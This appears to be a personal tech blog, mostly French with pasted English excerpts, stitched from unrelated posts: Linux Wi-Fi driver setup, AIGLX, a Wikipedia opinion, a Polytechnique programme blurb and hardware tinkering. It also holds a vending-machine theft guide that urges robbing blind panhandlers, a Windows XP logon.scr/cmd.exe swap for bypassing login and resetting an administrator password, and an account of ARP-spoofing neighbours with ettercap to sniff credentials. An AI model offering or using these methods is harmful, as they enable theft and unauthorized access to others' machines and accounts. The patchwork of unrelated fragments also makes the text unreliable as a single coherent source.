Encore mieux; sur un pentium II

ADAPTEUR USB Wua-1340 WIFI sous LINUX

Bon, on m'a fournis ce bidule Wua-1340 pour avoir une alternative sans-fils.

Comme ça a l'air un peu ''touchy'' à faire fonctionner sous Linux, ben j'me permet une petite sauvagarde des instructions trouvées sur le forum d'ubuntu.

Edit: ainsi qu'un extrait, plus-bas, de l'expérience réussis sous debian.

I just bought this card, D-Link WUA-1340, i am guessing it is a rt2500 card
but i cant find a bit on it on the ndiswrapper wiki pages or anything.
Its a newer card, i really hope im not SOL.
The driver that comes with it on CD dosent have any infs on it,
all exe's that extract the drivers and windows says the only driver files it uses are Dr71WU.sys...
The file is signed "Ralink 801.11 USB Wireless Adapter Driver" version 1.0.1.0.
I installed the sys file with ndiswrapper and it was "invalid"

There are a couple different places to find info about getting the ralink rt2500 set up but
they arent great. Please if you are sure thats what i need and that this card uses that chipset,
post the link that worked for you. Im running breezy.

Hi any luck since that.
I found there is driver for this D-Link WUA-1340 from http://ndiswrapper.sourceforge.net/m...index.php/List.
Than search WUA on that page you will find it, but I didn't make it work either.
Anyone know how to make it work?

Hello!

Having stumbled blindly for three days with USB wifi 'cards' that didn't work with Dapper
(a Belkin, a US Robotics too) I almost ran out of excuses to tell store clerks why I was
returning a working USB wifi 'card' (didn't want to hear one more clerk tell me "Well of course
it doesn't work. It isn't made for Linux). Finally bought the D-Link WUA-1340 Wireless G USB 2.0 Adapter.

Works through ndiswrapper like an ugly black charm
(well, when your laptop is an Inspirion 6400 black just doesn't go with it).

How'd it work? WARNING: Relative Linux newbie offering advice here.
Use caution. There may be and probably are a half-dozen simpler ways of doing this.

Pre: Running Ubuntu Dapper (Gnome) on a Dell Inspirion 6400 with the latest version of ndiswrapper
and wine from the Ubuntu repositories.

1. Put the D-Link resource CD in the drive. Plug in the adapter.

2. Go to the file "Drivers"

3. There sits a file "setup.exe"

4. In the shell type: wine setup.exe or in Nautilus 'right-click' the icon and
either "Open with Wine" or "Open With Other Application." In the case of the latter,
when the new 'select your app' window opens, click "Use a Custom Command" and enter "wine"
in that command line.

5. The D-Link setup wizard should appear. Follow all the steps just like you were in good ol Windows.

6. Once the installation is complete DON'T EXPECT your usb device to be working just yet
(even though the setup wizard suggests it might be).

7. In Nautilus open your "Home" folder. Crtl-H to show your hidden files.
Scroll down and open folder ".wine."

8. Now open the folder "drive_c"

9. Now open the folder "program files"

10. In that file there should be (if Wine and the D-Link wizard were successful)
a folder named "Drivers" You can make sure this is the correct folder by opening it.
Inside should be a number of files including that oh-so-prized Dr71WU.inf file!

11. Copy this whole "Drivers" folder to your home directory or wherever you'd like to have it
for ndiswrapper's needs.

12. Once copied, go back to the command line.

13. Run: ndiswrapper -l

14. Run: sudo ndiswrapper -i /home/yourname/yourdirectory/dr71wu.inf
(note here: on my laptop the inf file, when copied to my home folder, transformed from Dr71WU.inf
to dr71wu.inf)

15. Run: ndiswrapper -l to see if the driver loaded.
If everything worked you should see that both the driver and the hardware are present.

16. Run: sudo modprobe ndiswrapper

That's about it.

My adapter wasn't running until I rebooted my computer. That's an old Windows habit.

If you run into trouble during the installation, check resource pages for wine and ndiswrapper
running under Ubuntu.

Have you guys had any problems with setting the mode?

I have used Fedora for years, and I had a wireless PCMCIA card. Then, it slid forward in the card and
broke the card and slot. So, now I purchased a D-Link WUA-1340 at Office Max.

I'm not having much luck. I got ndiswrapper to detect it (and Linux/Fedora), but it won't go out of
Ad-Hoc mode (easily). I can use the NetworkManager (part of GNOME), and it will finally work.
But, it takes a while sometimes. Even then, it gives me a dynamic IP (I use a static IP),
and it gives me the wrong DNS that I normally use.

I would really like to have my wireless back! Thanks so much.

I therefore invested in a D-Link WUA-1340 USB wireless doohickey. This was fun in itself to get working. A lot of googling and wading through bogus instructions, but this one was useful.

Essentially I had to add the vendor & product ID to rtmp_def.h:

  {USB_DEVICE(0x07d1,0x3c04)}, /* D-Link */

(note: these values can be gleaned from the output of lsusb) then compile. What did I compile? The rt73 driver and firmware. Follow the general instructions in the README file in the driver tarball.

Add this to /etc/network/interfaces, to ensure the interface comes up at boot:

pre-up ifconfig rausb0 up
wireless-essid ...

AiGLX c'est cool, Sabayon ça torche et je suis un morron.

Ok, c'est pas aiXGL mais bien aiGLX, (vérifiez).

Donc quand j'essayais de le faire marcher sous sabayon linux, j'entrais pas le bon paramètre.

et quand on veut faire marcher l'opengl avec une carte nvidia, ça aide de le dire au kernel.

Bref j'ai réussi à faire fonctionner AIGLX sur mon ordi... celui qui a un motherboard Foxconn, qui devait faire office de freesbie...

Ah, pis ce qui faisait chier le boot c'était la nappe IDE... Con, non?

Alors j'ai donc prouvé une part de moronnerie par mon incapacité à
trouver une solution simple à un problème simple simplement parce que je cherchais une solution en apparence compliquée à un problème qui m'apparaissait compliqué.

Enfin, pour y arriver, j'ai taper au boot:

Bon, résumons;

J'avais besoin d'une machine un peu plus efficace puisque:

-1- Ma blonde est douée pour l'informatique : La bête c'est elle qui l'utilise.
-2- Ma tapette en rut préférée avait besoin d'un ordi après que son animal domestique ait pissé dessus.(Le motherboard de la poubelle, devinez il est chez qui ?...)
-3- Je me retrouve donc a roulé sur un dell GXA... Wow, quelle bécane, beuarrk...

Dans un élan de débile compulsion j'ai ''spotté'' ce qui me semblait être un bon deal:

un mobo et processur amd 64 avec de la ram et ça tapait pas le 150$ (enfin me semble)

Mais le motherboard est un Foxconn.

Les mêmes qui exploitent des travailleurs chinois pour faire vos ipods (vous savez le bidule très chic tellement répandu que c'est devenue quétaine?).

Bref, cette pièce de merde a la vidéo intégrée et un port Agp; pas de problème majeur mis a part des performances en retrait...


Les drivers sont pourris! La gestion du chipset vidéo est pourrie! C'est un chipset SiS et j'avais pas remarqué...

Une censure nécessaire ? Je crois personnellement qu'un système de filtrage de contenu basé sur l'age et le pays du public devrait être instauré, car, personnellement, bien que je ne placarderais pas les murs d'une garderie avec ces photos , je trouve qu'elles respectent l'esprit de Wikipedia. Peut-être que les photos permettant d'identifier les protagonistes devrait être modifiées ou adaptées. Wikipedia est une idée géniale et bien que je crois à une censure très modérée pour le bien commun, je ne trouve pas vraiment d'arguments valables pour ce geste de la part de WP.

The Muther Fuckin' Hack

Supplies:

Dollar 25 (or whatever pop costs where you’re trying to do this)

A Specific Pop Machine (I'll explain later)

Fast Hands (the kind that come attached to your body)

Optional:

An Unmarked Card (preferably something you don't care about in case you accidentally drop it in the machine)

The Set-Up

So first we have to get the money I recommend stealing from one of those blind panhandling asshole's (mostly change so it works well for pop machines).

Next we need to find a pop-machine

As you'll note it has a glass front and a conveyor belt that moves up and down it also has a green pop bottle p.o.s that get's in our way.

Teh H4x

Start by choosing the most expensive or the pop closest to being sold out (the energy drinks are usually the most expensive) because you will get you money back on this pop but it will show up as sold out put your money in the machine and get ready to hold the door.

Through the green dispenser pop bottle thing (awkward angle I know) it probably hurts you arm.

The pop will fall onto the raised conveyor belt which will rise to the level of the door and then attempt to push the bottle through the door; it will fail because your hand is keeping it securely shut

Ideally the conveyor belt will sink back down to the bottom of the machine and try this again (the trip down will be remarkably slower) hold the door once more and unless the machine has been modified it will give you your initial investment back and you won't be able to buy that number again.

Put money back into the machine and buy you final pop (it won't get sold out but it will cost whatever you put into the machine)

The Pop Machine	Hold this door	The Belt

VERY IMPORTANT:

Hold the door shut until the pops are touching each other. This will not work if the door has a chance to shut (between the two pops in this case) as soon as the door shuts the conveyor belt stops and the retracts leaving a pop bottle floating in the machine for the next guy who buys pop. Hopefully you can pull the first bottle out fast enough to get the second.

**You can try to repeat the middle part (put more than one pop onto the conveyor belt before buying the “final” pop) but I do not suggest it and I definitely do not suggest it for more than 3 pops in total including the final pop the reason is that you need incredible fast hands to pull out the bottles fast enough before the conveyor belt stops spinning.**

The O-Shit Factor

What to do when shit hits the fan:

There are a number of ways that this can go wrong

Pop get stuck. Depending on what bottle type pops occasionally get stuck in between the conveyor belt and a metal bar.

Try and pry open the door (it opens outward) and force the pop free (easier said than done)

To pry open the machine I recommend fingernails or an unmarked card (you might drop it on accident and lost it in the machine) this part requires a lot of feeling for where exactly the door is but you'll get it eventually.

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.

Once this happens if you enter this command minus the quotes

"net user password"

If the Administrator Account is called Frank and you want the password blah enter this

"net user Frank blah"

and this changes the password on franks machine to blah and your in.

If you use any number of popular web forums or even some commercial services like classmates.com, amazon.com, netzero.com or your provider's webmail service, you may not be aware that you're sending your credentials over the internet in the clear.

Some sites appear to secure your credentials, but they really don't. Some offer SSL sign-ins, but don't make them the default. Others don't even make an attempt to use proper SSL encryption or any attempt to obscure the credentials.

Remember the wall of sheep from DefCon? All of those people that kept logging into net resources assuming that nobody was listening? They were wrong!

Let's look at a couple of great examples of sites that have really awful security design, and see exactly how easy it is to steal credentials if you have access to the wire. These were obtained using nothing more than a linux laptop, a cable modem, ettercap (running ARP spoof and MiM gateway) and a bit of coffee.

READ: I'm posting this here, because from the sound of the comments, some people are quite confused about a number of things.

1) Yes, you CAN sniff your neighbors on a cable modem connection. Maybe not ALL, but the segment that I used allowed me to ARP-SPOOF my neighbors using ettercap.
2) Yes, you CAN sniff your neighbors on a switch. See #1.
3) I did not do any MiM attacks against SSL, only clear-text connections. HOWEVER! Ettercap CAN SNIFF SSL. Through a carefully crafted SSL cert, you can trick the user into clicking past your bogus cert and you can sniff everything over the SSL connection with ease. It's on ettercap's homepage - don't believe me, go read it!

If you want to follow along, you'll need an account at some of these domains. You can capture these web sessions using the sniffer of your choice. We're paying close attention to POST requests that are done over non-ssl connections.

Just imagine if you were on a Cox connection and ran an arp-spoofing attack against your neighbors. A quick instance of ettercap and you'd own your neighbors webmail accounts in a jiffy.

This is only a VERY small sampling of the more than 70 sites that I've researched that pass user credentials over the wire in clear text.

Lessons learned:

1) Pay attention when you're signing in to any website with credentials. Are you really logging in over SSL?
2) Adhere to common-sense practices when accessing websites over a possibly hostile network (hotspot, airport, your neighbor's misconfigured AP, etc.).
3) Encourage these websites to implement proper data security practices. If you don't, they may only decide to do so after a serious incident happens.

LE RÔLE DE L'INGÉNIEUR INFORMATICIEN
Les équipements et les appareils technologiques modernes ont des compo-
santes logicielles et matérielles parfois si intimement liées qu'il est presque
impossible de les dissocier : appareils de mesure et de captage de données,
contrôle de procédés, systèmes d'injection électronique et de carburant,
systèmes de commandes de vol des avions, etc. D'autre part, notre société
est de plus en plus axée sur l'information : partout, on trouve des ordinateurs
qui communiquent entre eux sur des réseaux de toutes sortes. Les logiciels
deviennent de plus en plus complexes, et leur création tout comme leur entre-
tien requièrent des compétences particulières. Ce sont les ingénieurs informa-
ticiens qui doivent intégrer des connaissances et des habiletés liées tant au
matériel qu'au logiciel, en vue d'attaquer des problèmes et d'y trouver des
solutions efficaces, performantes, rentables et socialement acceptables. Ils
s'intéressent à l'ordinateur en tant qu'outil. En considérant l'aspect matériel et
l'aspect logiciel, ils veillent à la conception et à l'implantation de systèmes
servant à recevoir, emmagasiner, traiter, transmettre, présenter et utiliser
l'information.
L'ÉVOLUTION DE LA FORMATION ET DE LA PROFESSION
De plus en plus, les employeurs recherchent des ingénieurs qui possèdent de
bonnes connaissances technologiques et scientifiques, qui ont une approche
axée sur la résolution de problèmes et sur la rentabilité, et qui sont conscients
des incidences sociales, économiques et écologiques de leurs projets. La
formation élargie offerte par Polytechnique va dans ce sens et prépare en
outre les futurs diplômés à une gamme plus vaste d'emplois, qui, autrefois,
n'étaient pas occupés par des ingénieurs. L'ingénieur en informatique est
appelé à faire partie d'équipes d'ingénierie mutidisciplinaires, et c'est sa
formation générale d'ingénieur, alliée à son expertise en génie informatique,
qui fait sa force.
LA FORMATION DE L'INGÉNIEUR INFORMATICIEN
La formation en génie informatique s'intéresse à la conception et à l'implanta-
tion de systèmes, constitués de matériel et de logiciel, ayant pour fonction de
capter, stocker, traiter, transmettre, contrôler, présenter et, finalement, utiliser
l'information, le tout dans un contexte pragmatique d'application à des pro-
blèmes du monde réel.
La filière «classique» vise une formation large, elle permet à l’étudiant de
choisir une orientation thématique. Trois concentrations ciblent plus particuliè-
rement le marché du travail dans les domaines de l'industrie (Informatique
embarquée), du graphisme et du divertissement (Multimédia) et de la réseau-
tique (Réseaux et informatique mobile).
Note particulière au programme

Le département recommande que tous les étudiants inscrits en génie informa-
tique aient un ordinateur personnel dès le début de leurs études. Le départe-
ment suggère également que cet ordinateur soit un ordinateur portatif.

J'ai essayé Ubuntu 64. Je l'ai ''cassé'' en 15 minutes... en mettant à jour les paquets/programmes...

Dommage c'était en 64 bits et je m'attendais à quelque chose d'intelligent , qui ne me laisserait pas tout casser en fait.

Mais j'avoue que ce site m'a donné de nouveaux arguments pour éviter la ''mode Ubuntu'':

Je pense à des trucs bizarres;

Je vais péter les plombs.

Je cherche une distribution basée Debian , AMD64, supportant Xgl ou AiXgl supportant vraiment le clavier canadien français standard (KB=cf) et multilingue .

Debian car c'est les .debs intègre réellement un arbre de dépendances dans les paquets semble-t'il..

AMD64 car je veux exploiter mon dernier joujou
et enfin je veux voir XGL ou autre bidule fonctionnant sur mon PC .

Jusqu'ici j' envisage Knoppix , dérivé Debian, mais... Comment on embarque XGl ?
j'ai pas de trouvé de tutoriel clair.

J'ai entendu dire que Sylvie Migneault avait eu confirmation de Klaus Knopper que la correction de la disposition du clavier serait faite il y a un bout de temps.

Je suis peut-être trop exigeant. Knoppix 64 semble en être à ses balbutiements,
Xgl semble être un rituel vaudou, surtout sur ma voodoo 3 2000
(pci 16mb 3dfx flashée/overclockée +34mhz)

Disque dur: Seagate de Xbox vidangé +/- 8go,

A faire: réinstaller slackware en choisissant les paquetages
à la main et refaire les partitions à peu près comme ceci:

• Démarrez l'éditeur de registre (REGEDIT.EXE).
• Allez à: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom.
• Double-cliquez la valeur Autorun , et entrez 0 comme valeur. (Si la valeur existe pas, selectionnez Edit -> New -> DWORD Value, et tapez "Autorun" for its name.)
• Il se peut que vous de viez fermer votre session pour que ce soit effectif.

• Note: Windows ne saura plus quand vous insérez un cdrom: vous devrez rafraichier votre vue (F5) dans ''Poste de travail'' ou même directement dans le CDROM.

Overclocké mon barton 2500+ en 32oo+ (gain d'environ 300 mhz). (Avec le fan d'origine !)

Maintenant y faut que je tète J.C. pour qu'il me donne son Subwoofer qui a subit un ''Sandy''...

C'est une boîte blindée pis ce serais dommage que ça ce retrouve au vidange...
J'vais peut-être en faire un appuis-pieds vibrant pour ma blonde...
